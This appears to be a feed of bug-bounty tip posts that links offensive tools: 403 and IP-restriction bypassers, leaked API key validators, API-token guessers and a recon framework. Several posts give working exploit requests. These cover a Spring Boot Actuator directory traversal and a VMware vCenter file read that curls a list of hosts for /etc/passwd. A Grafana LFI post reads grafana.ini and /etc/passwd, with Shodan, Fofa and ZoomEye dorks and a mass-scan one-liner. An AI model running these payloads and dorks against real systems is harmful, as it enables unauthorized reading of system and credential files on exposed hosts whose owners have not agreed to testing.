4-ZERO-3

Tool to bypass 403/401. This script contain all the possible techniques to do the same.

https://github.com/Dheerajmadhukar/4-ZERO-3

#forbidden #bypass #bugbounty

Spring Boot Actuator — Logview Directory Traversal (CVE-2021-21234)

http://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../

Details:
https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/

#spring #actuator #cve #bugbounty

VMware vCenter (7.0.2.00100) — File Read + SSRF + XSS

cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done

Shodan Dorks:
http.title:"ID_VC_Welcome"

Zoomeye Dorks:
app:"VMware vCenter"

https://github.com/l0ggg/VMware_vCenter

#vmware #vcenter #bugbounty

Webapp Wordlists

This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.

https://github.com/p0dalirius/webapp-wordlists

#wordlist #cms #bugbounty

KeyHacks

Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.

https://github.com/streaak/keyhacks

#api #key #check #bugbounty

Grafana — Unauthorized Arbitrary Read File

The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+

Dorks:
Shodan: title:"Grafana"
Fofa.so: app="Grafana"
ZoomEye: grafana

PoC
http://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini

The "plugin-id" could be any plugin that exists in the system

One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd -mc 200 -ms 'root:x:0:0'

#grafana #lfi #bugbounty #pentest

ipsourcebypass

This Python script can be used to bypass IP source restrictions using HTTP headers.

https://github.com/p0dalirius/ipsourcebypass

#ip #header #bypass #bugbounty

log4hshell — Quick Guide

https://musana.net/2021/12/13/log4shell-Quick-Guide/

#log4j #waf #bypass #bugbounty

Bug Bounty Tip — Log4j Vulnerability Cheatsheet

— How It Works
— Test Environments
— Challenges & Labs (Rooms)
— Where Payloads can be Injected
— What Information can be Extracted
— How To Identify (Services & Scanners)

#log4j #cheatsheet #bugbounty

Osmedeus

Fully automated offensive security framework for reconnaissance and vulnerability scanning

Features
— Subdomain Scan.
— Subdomain TakeOver Scan.
— Screenshot the target.
— Basic recon like Whois, Dig info.
— Web Technology detection.
— IP Discovery.
— CORS Scan.
— SSL Scan.
— Wayback Machine Discovery.
— URL Discovery.
— Headers Scan.
— Port Scan.
— Vulnerable Scan.
— Seperate workspaces to store all scan output and details logging.
— REST API.
— React Web UI.
— Support Continuous Scan.
— Slack notifications.
— Easily view report from commnad line.

https://github.com/j3ssie/Osmedeus

#osint #vulnerability #scanner #bugbounty

API Guesser

A simple website to guess API Key / OAuth Token

When you do pentest / Github recon and find API key / OAuth token but you don't know what API key it is, you can use my website that I built from javascript

https://api-guesser.netlify.app

Source:
https://github.com/daffainfo/apiguesser-web

#api #token #osint #bugbounty